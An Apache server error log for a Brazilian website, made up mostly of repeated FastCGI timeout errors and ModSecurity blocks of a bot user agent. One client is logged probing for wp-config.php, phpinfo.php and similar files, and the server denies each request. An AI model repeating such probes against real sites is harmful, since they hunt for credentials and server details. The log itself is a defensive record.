[Mon Mar 16 01:57:22.109541 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59146] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:57:43.106518 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59360] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:58:04.133782 2026] [proxy_fcgi:error] [pid 10831:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59506] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:58:25.137806 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59668] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:58:46.069911 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59824] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:59:07.057907 2026] [proxy_fcgi:error] [pid 10709:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59946] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:59:28.133817 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60104] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 01:59:50.121897 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60270] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:00:14.129814 2026] [proxy_fcgi:error] [pid 10709:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60480] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:00:35.129853 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60666] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:00:56.029961 2026] [proxy_fcgi:error] [pid 10709:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60844] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:01:18.860317 2026] [proxy_fcgi:error] [pid 10709:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:32824] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:01:40.115754 2026] [proxy_fcgi:error] [pid 10831:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:32988] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:02:01.134057 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33154] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:02:15.361226 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.244.31:57542] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeO146lpbStxTqkSks9WgAAAkw"]
[Mon Mar 16 02:02:22.134283 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33406] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:02:23.513528 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.228.16:49444] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeO3_9ocpUE4ed4uDzA4wAAAgw"]
[Mon Mar 16 02:02:43.133974 2026] [proxy_fcgi:error] [pid 10772:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33564] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:03:04.157819 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33686] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:03:25.126684 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33806] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:03:46.125921 2026] [proxy_fcgi:error] [pid 10772:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33930] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:04:07.141793 2026] [proxy_fcgi:error] [pid 10831:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34076] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:04:22.029954 2026] [mime_magic:error] [pid 21946:tid 140411674785536] (70014)End of file found: [client 34.206.76.135:58831] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Mon Mar 16 02:04:22.030443 2026] [access_compat:error] [pid 21946:tid 140411674785536] [client 34.206.76.135:58831] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Mon Mar 16 02:04:33.041903 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34240] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:04:55.913526 2026] [proxy_fcgi:error] [pid 10651:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34370] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:05:17.083827 2026] [proxy_fcgi:error] [pid 10651:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34542] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:05:38.069815 2026] [proxy_fcgi:error] [pid 10651:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34664] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:05:59.141945 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34812] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:06:20.125955 2026] [proxy_fcgi:error] [pid 10831:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34982] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:06:42.122771 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35130] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:07:04.077903 2026] [proxy_fcgi:error] [pid 10831:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35282] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:07:18.901908 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.244.31:46200] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeQBrABkC4fWIHEf8G8jgAAAFA"]
[Mon Mar 16 02:07:25.129774 2026] [proxy_fcgi:error] [pid 10831:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35368] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:07:26.626850 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.228.16:37574] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeQDnbQATo66fKoS7wbggAAAMw"]
[Mon Mar 16 02:07:46.133827 2026] [proxy_fcgi:error] [pid 10709:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35508] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:08:07.133930 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35624] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:08:28.131700 2026] [proxy_fcgi:error] [pid 10772:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35736] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:08:50.125901 2026] [proxy_fcgi:error] [pid 10772:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35934] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:09:11.033823 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36106] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:09:32.133812 2026] [proxy_fcgi:error] [pid 32654:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36368] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:09:53.021855 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36542] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:10:17.129797 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36736] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:10:39.037948 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36882] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:11:00.125831 2026] [proxy_fcgi:error] [pid 10831:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36996] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:11:21.132905 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37100] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:11:42.069827 2026] [proxy_fcgi:error] [pid 10709:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37270] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:12:28.125858 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37926] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:12:45.842673 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.228.16:55454] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeRTRXjF1vJNtV6CWrLDAAAAdg"]
[Mon Mar 16 02:12:46.544755 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.244.31:40298] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeRThXjF1vJNtV6CWrLDgAAAcY"]
[Mon Mar 16 02:13:08.124221 2026] [proxy_fcgi:error] [pid 10651:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38560] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:13:29.129850 2026] [proxy_fcgi:error] [pid 10651:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38728] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:13:50.129768 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38894] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:14:11.129831 2026] [proxy_fcgi:error] [pid 10831:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39024] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:14:32.033860 2026] [proxy_fcgi:error] [pid 32654:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39212] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:14:53.041917 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39386] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:15:14.121992 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39514] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:15:36.121860 2026] [proxy_fcgi:error] [pid 10831:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39634] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:15:57.137758 2026] [proxy_fcgi:error] [pid 10772:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39776] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:16:19.389777 2026] [proxy_fcgi:error] [pid 10651:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39962] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:16:41.125784 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40120] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:17:02.129151 2026] [proxy_fcgi:error] [pid 10651:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40308] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:17:24.070458 2026] [proxy_fcgi:error] [pid 10709:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40432] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:17:45.133854 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40666] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:17:47.451321 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.228.16:33440] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeSewlT9VtDQc7bgUxs3AAAARA"]
[Mon Mar 16 02:17:52.858742 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.244.31:54628] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeSgLysWC90G-1nBrAYwwAAAZM"]
[Mon Mar 16 02:18:06.145815 2026] [proxy_fcgi:error] [pid 10651:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40868] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:18:27.144675 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41070] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:18:51.121795 2026] [proxy_fcgi:error] [pid 10709:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41238] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:19:13.138078 2026] [proxy_fcgi:error] [pid 10709:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41376] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:19:34.091678 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41534] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:19:55.134534 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41718] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:20:21.133846 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41870] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:20:43.140988 2026] [proxy_fcgi:error] [pid 10651:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42006] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:21:04.121808 2026] [proxy_fcgi:error] [pid 10772:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42138] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:21:25.129837 2026] [proxy_fcgi:error] [pid 10772:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42268] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:21:46.069829 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42358] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:22:07.117827 2026] [proxy_fcgi:error] [pid 32654:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42442] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:22:28.167116 2026] [proxy_fcgi:error] [pid 10831:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42598] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:22:49.117801 2026] [proxy_fcgi:error] [pid 10651:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42766] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:23:10.115397 2026] [proxy_fcgi:error] [pid 10831:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42852] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:23:15.776008 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.228.16:59194] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeTw5qj1wV0Si-Okee6EgAAABg"]
[Mon Mar 16 02:23:32.137805 2026] [proxy_fcgi:error] [pid 10709:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42988] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:23:53.146872 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43166] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:24:14.124495 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43338] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:24:35.130170 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43512] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:24:56.029878 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43630] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:25:17.130263 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43756] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:25:42.144131 2026] [proxy_fcgi:error] [pid 32654:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43934] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:26:05.145979 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44164] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:26:26.125782 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44320] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:26:47.143738 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44506] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:27:08.122759 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44670] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:27:29.053786 2026] [proxy_fcgi:error] [pid 10831:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44788] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:27:50.121790 2026] [proxy_fcgi:error] [pid 10831:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44898] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:28:11.133803 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45026] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:28:21.302886 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.228.16:41624] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeU9Zqj1wV0Si-Okee6JQAAAA4"]
[Mon Mar 16 02:28:25.502608 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.244.31:51008] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeU-Y6lpbStxTqkSks_CAAAAkY"]
[Mon Mar 16 02:28:32.057863 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45158] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:28:54.045920 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45312] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:29:16.084558 2026] [proxy_fcgi:error] [pid 10651:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45416] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:29:38.093819 2026] [proxy_fcgi:error] [pid 10651:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45486] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:29:56.700311 2026] [access_compat:error] [pid 10772:tid 140411607643904] [client 45.148.10.174:37170] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-config.php
[Mon Mar 16 02:29:59.045967 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45638] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:30:09.537933 2026] [core:alert] [pid 11972:tid 140411658000128] [client 45.148.10.174:58556] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Mon Mar 16 02:30:10.768896 2026] [mime_magic:error] [pid 21806:tid 140411691570944] (70014)End of file found: [client 45.148.10.174:40064] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Mon Mar 16 02:30:17.366699 2026] [access_compat:error] [pid 10651:tid 140411741927168] [client 45.148.10.174:40090] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/phpinfo.php
[Mon Mar 16 02:30:17.574214 2026] [access_compat:error] [pid 10651:tid 140411607643904] [client 45.148.10.174:40090] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Mon Mar 16 02:30:17.808731 2026] [access_compat:error] [pid 10651:tid 140411548894976] [client 45.148.10.174:40090] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/test.php
[Mon Mar 16 02:30:21.037785 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45762] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:30:42.137806 2026] [proxy_fcgi:error] [pid 10709:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45862] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:31:03.121863 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45994] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:31:27.133785 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46160] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:31:48.137854 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46298] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:32:09.133804 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46414] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:32:30.126914 2026] [proxy_fcgi:error] [pid 10709:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46536] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:32:51.122259 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46676] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:33:12.117224 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46860] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:33:33.085154 2026] [proxy_fcgi:error] [pid 10651:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47054] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:33:43.499961 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.228.16:41042] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeWN46lpbStxTqkSks_NwAAAkA"]
[Mon Mar 16 02:33:46.728899 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.244.31:36010] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeWOnbQATo66fKoS7wcRwAAAMs"]
[Mon Mar 16 02:33:54.117777 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47260] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:34:15.127371 2026] [proxy_fcgi:error] [pid 10709:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47384] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:34:38.077919 2026] [proxy_fcgi:error] [pid 10831:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47480] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:34:59.127539 2026] [proxy_fcgi:error] [pid 10651:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47630] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:35:25.133857 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47870] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:35:46.048460 2026] [proxy_fcgi:error] [pid 10651:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48016] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:36:07.133937 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48168] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:36:29.129849 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48314] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:36:50.037894 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48492] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 02:37:11.125799 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48640] AH01075: Error dispatching request to : (polling)
